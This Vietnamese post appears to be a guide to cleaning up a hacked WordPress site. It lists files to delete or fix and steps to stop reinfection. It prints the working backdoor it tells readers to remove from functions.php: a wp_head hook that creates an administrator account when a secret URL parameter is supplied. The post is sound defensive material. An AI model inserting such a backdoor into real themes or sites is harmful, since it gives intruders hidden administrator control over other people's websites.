Lỗi này rất nhiều người bị nhé nên các bạn thường xuyên check index website với cú pháp “site:tenmien.com” nếu xảy ra hiện tượng như trên thì cần khắc phục ngay.
Khắc phục:
– Xóa file htaccess -> vào wp-admin cập nhật permalink
– File wp-blog-header.php, XMLRPC bị gắn shell, loại bỏ đoạn code shell
– Xóa file sitemap.xml
– Xóa tất cả file shell php trong thư mục wp-content/uploads, nếu ko tìm dc thì chặn thực thi php trong thư mục này bằng cách tạo file .htaccess trong uploads, dán code này
<FilesMatch ".((php[0-9]?)|p?html?|pl|sh|java|cpp|c|h|js|rc)$">
SetHandler None
</FilesMatch>
Vào file functions.php trong theme tìm kiếm xóa đoạn code set_role() này đi(nếu có):
add_action( 'wp_head', 'my_back' );
function my_back() {
if ( $_GET['back'] == 'h00h800f' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'guest', 'h00h800f' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
– Xóa user do hung thủ tạo
– Trong thư mục plugin cũng có 1 thư mục có dạng 876ad5dbbd80 là shell, xóa
– 1 file xác minh quyền google ở thư mục gốc, xóa để thu hồi quyền
– Submit lại sitemap trong webmaster tool để ko mất top
CÁCH PHÒNG:
– Nâng cấp wp lên mới nhất, chặn chức năng edit file wp
– Chmod file .htaccess để ko bị sửa
– Đặt mật khẩu mạnh
Tạm thời bug này chưa có thông báo từ phía wp nên mọi người dùng wordpress đề phòng
Update: bản 4.7.1 đã fix dc lỗi này